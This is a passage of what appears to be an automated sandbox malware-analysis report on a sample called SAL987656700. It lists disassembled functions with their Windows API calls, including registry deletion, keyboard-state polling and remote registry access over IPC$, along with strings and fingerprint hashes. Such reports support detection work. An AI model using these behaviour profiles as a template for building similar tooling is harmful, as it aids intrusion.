                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                      • String ID: ThumbnailClass
                                      • API String ID: 1311036022-1241985126
                                      • Opcode ID: 0b1da71c2ad5746627a08567c02755413e5bfb5697491332b329500ef18b6819
                                      • Instruction ID: 80cc8fd69cd95944f20b86400f7e5fa81ade602913cd5b06c3ed0dbd37f5193d
                                      • Opcode Fuzzy Hash: 0b1da71c2ad5746627a08567c02755413e5bfb5697491332b329500ef18b6819
                                      • Instruction Fuzzy Hash: 5B91EE711082469FDB04DF56C884FAA77E8FF86324F049469FD89DA096DB30ED45CBA2
                                      Function 0090CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0090CC64
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0090CC8D
                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0090CD48
                                        • Part of subcall function 0090CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0090CCAA
                                        • Part of subcall function 0090CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0090CCBD
                                        • Part of subcall function 0090CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0090CCCF
                                        • Part of subcall function 0090CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0090CD05
                                        • Part of subcall function 0090CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0090CD28
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0090CCF3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                      • API String ID: 2734957052-4033151799
                                      • Opcode ID: 337127ed5e4d067ae9bc1252a68191fb25787b7851e9d9efc03930fc7c3c949e
                                      • Instruction ID: e48131fe300328eee3bce47af7d8c4c23913f939a9d1ce399bec2796aa59f11d
                                      • Opcode Fuzzy Hash: 337127ed5e4d067ae9bc1252a68191fb25787b7851e9d9efc03930fc7c3c949e
                                      • Instruction Fuzzy Hash: 3C3161B1A45129BFDB208B94DC88EFFBB7CEF45750F004665B906E2290D7349E45EAA0
                                      Function 008EE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • timeGetTime.WINMM ref: 008EE6B4
                                        • Part of subcall function 0089E551: timeGetTime.WINMM(?,?,008EE6D4), ref: 0089E555
                                      • Sleep.KERNEL32(0000000A), ref: 008EE6E1
                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 008EE705
                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 008EE727
                                      • SetActiveWindow.USER32 ref: 008EE746
                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008EE754
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 008EE773
                                      • Sleep.KERNEL32(000000FA), ref: 008EE77E
                                      • IsWindow.USER32 ref: 008EE78A
                                      • EndDialog.USER32(00000000), ref: 008EE79B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                      • String ID: BUTTON
                                      • API String ID: 1194449130-3405671355
                                      • Opcode ID: c7eb7390ab60e7d7f1e1fc8e0f5c8438b99db82e562bce93474dd7e3bc2e9f54
                                      • Instruction ID: b4c69ac434c183c497a4e4d6c9ba4699950539782f56dd0ca62c3a1b597c05c4
                                      • Opcode Fuzzy Hash: c7eb7390ab60e7d7f1e1fc8e0f5c8438b99db82e562bce93474dd7e3bc2e9f54
                                      • Instruction Fuzzy Hash: 192181B036C785AFEB105F26EC89B693B69F75634AF104425F415C21B1DB71AC00EB25
                                      Function 008EE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008EEA5D
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 008EEA73
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008EEA84
                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 008EEA96
                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 008EEAA7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: SendString$_wcslen
                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                      • API String ID: 2420728520-1007645807
                                      • Opcode ID: bdc0f516e0b3bbe59df6fc6930f2da8237418ab7cc0470c61dc617534b3f3816
                                      • Instruction ID: d43589d2128691948fbbf43f246d37a38fdf02bd1076b584f38a98bdd35b3883
                                      • Opcode Fuzzy Hash: bdc0f516e0b3bbe59df6fc6930f2da8237418ab7cc0470c61dc617534b3f3816
                                      • Instruction Fuzzy Hash: 0611547165026979D730B766DC4ADFF6A7CFBD2B44F000429B401E20D1EAB04A05C6B2
                                      Function 008E5CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,00000001), ref: 008E5CE2
                                      • GetWindowRect.USER32(00000000,?), ref: 008E5CFB
                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 008E5D59
                                      • GetDlgItem.USER32(?,00000002), ref: 008E5D69
                                      • GetWindowRect.USER32(00000000,?), ref: 008E5D7B
                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 008E5DCF
                                      • GetDlgItem.USER32(?,000003E9), ref: 008E5DDD
                                      • GetWindowRect.USER32(00000000,?), ref: 008E5DEF
                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 008E5E31
                                      • GetDlgItem.USER32(?,000003EA), ref: 008E5E44
                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 008E5E5A
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 008E5E67
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$ItemMoveRect$Invalidate
                                      • String ID:
                                      • API String ID: 3096461208-0
                                      • Opcode ID: ab57e5a0f902e2b0f8f4899875b699a9923d790a88e9308fb8083955c20f9318
                                      • Instruction ID: 9816faec88fe601aefc7a94dfc97d9cc5a1bcfa6daf3edbc54a4d5710719a3e0
                                      • Opcode Fuzzy Hash: ab57e5a0f902e2b0f8f4899875b699a9923d790a88e9308fb8083955c20f9318
                                      • Instruction Fuzzy Hash: 63513FB0B5060AAFDF18CF69CD89AAEBBB5FB49304F108129F515E7290D770AE00CB50
                                      Function 00899838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00899944: GetWindowLongW.USER32(?,000000EB), ref: 00899952
                                      • GetSysColor.USER32(0000000F), ref: 00899862
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ColorLongWindow
                                      • String ID:
                                      • API String ID: 259745315-0
                                      • Opcode ID: 9b897d9e00853d7113078bce80a2274224dcf688230ca7767a9a7e837c886f04
                                      • Instruction ID: 1937afdbb3c5c4b1ba454f3444782ea712dfbbe077d1469f573415367a4c612b
                                      • Opcode Fuzzy Hash: 9b897d9e00853d7113078bce80a2274224dcf688230ca7767a9a7e837c886f04
                                      • Instruction Fuzzy Hash: 6D418E71248644AEDF216F3C9C84BB93B65FB06321F18465DF9E2D62E1E7319841EB11
                                      Function 008E96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,008CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 008E9717
                                      • LoadStringW.USER32(00000000,?,008CF7F8,00000001), ref: 008E9720
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,008CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 008E9742
                                      • LoadStringW.USER32(00000000,?,008CF7F8,00000001), ref: 008E9745
                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 008E9866
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message_wcslen
                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                      • API String ID: 747408836-2268648507
                                      • Opcode ID: 21d2c3b21e60ed8c9ac223c660b60a0332f662ae5baf350e79807123fb6f7600
                                      • Instruction ID: 0b239099834212698a0bedbdf34eff0d881cf1ceb732891f22e7cff7c3b390fe
                                      • Opcode Fuzzy Hash: 21d2c3b21e60ed8c9ac223c660b60a0332f662ae5baf350e79807123fb6f7600
                                      • Instruction Fuzzy Hash: C9416B72904219AACF04FBE8DD86DEE7778FF56740F140025F201B2092EA756F48CB62
                                      Function 008E06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00886B57: _wcslen.LIBCMT ref: 00886B6A
                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008E07A2
                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008E07BE
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008E07DA
                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 008E0804
                                      • CLSIDFromString.COMBASE(?,000001FE), ref: 008E082C
                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008E0837
                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008E083C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                      • API String ID: 323675364-22481851
                                      • Opcode ID: aad39524d4ca667014db9c4f0bdd015fc54dad44be18db205a4ce1cd5b4ca895
                                      • Instruction ID: 355aec2ebb88123a00a81df870648e75bc2ab7c10defd68ec551040de7e5fbd9
                                      • Opcode Fuzzy Hash: aad39524d4ca667014db9c4f0bdd015fc54dad44be18db205a4ce1cd5b4ca895
                                      • Instruction Fuzzy Hash: 5A413A72C10229ABDF15EBA4DC85CEDB778FF08350F054129E911A31A1EB709E44CF91
                                      Function 00903C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00903C5C
                                      • CoInitialize.OLE32(00000000), ref: 00903C8A
                                      • CoUninitialize.COMBASE ref: 00903C94
                                      • _wcslen.LIBCMT ref: 00903D2D
                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00903DB1
                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00903ED5
                                      • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00903F0E
                                      • CoGetObject.OLE32(?,00000000,0091FB98,?), ref: 00903F2D
                                      • SetErrorMode.KERNEL32(00000000), ref: 00903F40
                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00903FC4
                                      • VariantClear.OLEAUT32(?), ref: 00903FD8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                      • String ID:
                                      • API String ID: 429561992-0
                                      • Opcode ID: 0fb7dfc77e8ab61805d6762bf0fd9d3e99396ed4cc9a291bee6a0b21a6d553de
                                      • Instruction ID: e4abca37857fe76834ea6d23c4fc1ba0ef83148f690be9c8e6f3915e797d3acf
                                      • Opcode Fuzzy Hash: 0fb7dfc77e8ab61805d6762bf0fd9d3e99396ed4cc9a291bee6a0b21a6d553de
                                      • Instruction Fuzzy Hash: D9C123B16082059FD700DF68C88496BBBE9FF89744F14891DF98ADB290D731EE05CB52
                                      Function 008F7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 008F7AF3
                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008F7B8F
                                      • SHGetDesktopFolder.SHELL32(?), ref: 008F7BA3
                                      • CoCreateInstance.COMBASE(0091FD08,00000000,00000001,00946E6C,?), ref: 008F7BEF
                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008F7C74
                                      • CoTaskMemFree.COMBASE(?), ref: 008F7CCC
                                      • SHBrowseForFolderW.SHELL32(?), ref: 008F7D57
                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008F7D7A
                                      • CoTaskMemFree.COMBASE(00000000), ref: 008F7D81
                                      • CoTaskMemFree.COMBASE(00000000), ref: 008F7DD6
                                      • CoUninitialize.COMBASE ref: 008F7DDC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                      • String ID:
                                      • API String ID: 2762341140-0
                                      • Opcode ID: 9ff309b37e9329171cc889887c6f7d9dd593622793caceaa35fcdcc161569762
                                      • Instruction ID: a748b13d6aeed02e8ffc543aaa9cf8db1096004b13bcb5da931cf3eaf42e29c6
                                      • Opcode Fuzzy Hash: 9ff309b37e9329171cc889887c6f7d9dd593622793caceaa35fcdcc161569762
                                      • Instruction Fuzzy Hash: ADC11B75A04109AFDB14DFA8C884DAEBBF9FF48314B148499E919DB361D730EE45CB90
                                      Function 0091541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00915504
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00915515
                                      • CharNextW.USER32(00000158), ref: 00915544
                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00915585
                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0091559B
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009155AC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$CharNext
                                      • String ID:
                                      • API String ID: 1350042424-0
                                      • Opcode ID: d49d6bb25e05b1eb3ca707b69dc96a45684ed14a98166f6806cb8ac0c9498d96
                                      • Instruction ID: 6b4aad1f044ec730aba7b41aa493c753341e80670b9e7b134e0f9db71309f041
                                      • Opcode Fuzzy Hash: d49d6bb25e05b1eb3ca707b69dc96a45684ed14a98166f6806cb8ac0c9498d96
                                      • Instruction Fuzzy Hash: 7A61B170B0460DEFDF108F55CC84AFE7BB9EB89360F528545F525A62A0D7748AC0DB61
                                      Function 008DFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 008DFAAF
                                      • SafeArrayAllocData.OLEAUT32(?), ref: 008DFB08
                                      • VariantInit.OLEAUT32(?), ref: 008DFB1A
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 008DFB3A
                                      • VariantCopy.OLEAUT32(?,?), ref: 008DFB8D
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 008DFBA1
                                      • VariantClear.OLEAUT32(?), ref: 008DFBB6
                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 008DFBC3
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008DFBCC
                                      • VariantClear.OLEAUT32(?), ref: 008DFBDE
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008DFBE9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                      • String ID:
                                      • API String ID: 2706829360-0
                                      • Opcode ID: 07597e436c41afaa34a990adc2956e5a585c56c2f1744c3e735a65911e3e78b4
                                      • Instruction ID: 77bf5a954be407dc385ed49ff952e30ba05723efcf303b0289a5a334c9a14749
                                      • Opcode Fuzzy Hash: 07597e436c41afaa34a990adc2956e5a585c56c2f1744c3e735a65911e3e78b4
                                      • Instruction Fuzzy Hash: A5415275A04219AFDB00DF68D8549EDBBB9FF08354F00816AE946E7361CB30A945DF91
                                      Function 008E9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 008E9CA1
                                      • GetAsyncKeyState.USER32(000000A0), ref: 008E9D22
                                      • GetKeyState.USER32(000000A0), ref: 008E9D3D
                                      • GetAsyncKeyState.USER32(000000A1), ref: 008E9D57
                                      • GetKeyState.USER32(000000A1), ref: 008E9D6C
                                      • GetAsyncKeyState.USER32(00000011), ref: 008E9D84
                                      • GetKeyState.USER32(00000011), ref: 008E9D96
                                      • GetAsyncKeyState.USER32(00000012), ref: 008E9DAE
                                      • GetKeyState.USER32(00000012), ref: 008E9DC0
                                      • GetAsyncKeyState.USER32(0000005B), ref: 008E9DD8
                                      • GetKeyState.USER32(0000005B), ref: 008E9DEA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
